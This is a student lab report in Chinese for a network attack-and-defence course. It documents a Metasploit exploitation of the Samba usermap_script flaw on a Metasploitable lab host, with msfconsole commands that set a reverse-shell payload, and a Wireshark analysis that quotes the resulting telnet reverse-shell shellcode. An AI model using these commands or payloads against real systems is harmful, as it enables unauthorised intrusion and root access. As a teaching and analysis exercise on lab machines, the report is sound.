20232810 2023-2024-2 《网络攻防实践》实验七

一、实践内容

（1）使用Metasploit进行Linux远程渗透攻击
任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：
①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；
②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；
③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；
④设置渗透攻击参数（RHOST，LHOST，TARGET等）；
⑤执行渗透攻击；
⑥查看是否正确得到远程Shell，并查看获得的权限。
（2）实践作业：攻防对抗实践
攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

二、实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

（1）使用Metasploit进行Linux远程渗透攻击
任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：
①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；
②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；
③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；
④设置渗透攻击参数（RHOST，LHOST，TARGET等）；
⑤执行渗透攻击； ⑥查看是否正确得到远程Shell，并查看获得的权限。

（1）首先通过输入 sudo msfconsole 指令进入操作台。
在这里插入图片描述
（2）通过 search usermap_script 查找漏洞信息，然后通过 use exploit/multi/samba/usermap_script 使用相关攻击脚本，使用 show payloads查看payload类型。

（3）使用set payload cmd/unix/reverse选择攻击PAYLOAD，反向连接。然后分别使用 set LHOST 192.168.200.6 (kali) 和 set RHOST 192.168.200.125（Metasploitable_Linux） 进行表示攻击机IP地址和靶机IP地址设置。设置完成后，使用 exploit 进行攻击。
在这里插入图片描述
（4）攻击完成后，根据提示操作得到远程shell，并且使用ifconfig查询靶机IP，靶机IP成功获取。通过和靶机ifconfig查询结果对比，IP均为192.168.200.125，表明攻击成功。

（5）通过who am i查询，发现已经获得了root权限，而靶机仍然是非root账号登录，这表明提权成功。
在这里插入图片描述

2.2 攻防对抗实践

攻击方：使用 Metasploit ，选择 Metasploitable靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

攻击方IP：192.168.200.6
防守方IP：192.168.200.125
在这里插入图片描述
（1）通过对Wireshark抓包分析，我们可以得到攻击者IP为192.168.200.6，目标IP为192.168.200.125，目标端口为139。经过查询可知139号端口是Unix中的Samba服务端口，可知攻击利用了Samba服务漏洞。攻击发起时间是从ARP协议的询问开始。
在这里插入图片描述
（2）从第一个SMB数据包中找到shellcode如图所示。其中，nohup是no hang up的缩写，就是不挂断的意思，用nohup运行命令可以使命令永久的执行下去，和用户终端没有关系；telnet 192.168.200.7 4444表明数据是通过4444号通信端口管控传入攻击机的；sh是linux中运行shell的命令，是shell的解释器。
在这里插入图片描述
（3）再通过进一步的tcp流分析，我们可以看到成功之后在本地执行命令的信息。

三、学习中遇到的问题及解决

在第一部分实验中创建目录时，忘记查询公积金机在创建前的结果了。

四、学习感想和体会

通过这次实验学习了Linux远程渗透攻击，对Linux操作系统安全机制等有了进一步了解。

五、参考资料

https://blog.csdn.net/weixin_51457231/article/details/138424463?csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22138424463%22%2C%22source%22%3A%22weixin_51457231%22%7D
https://www.cnblogs.com/ql5199/p/16189367.html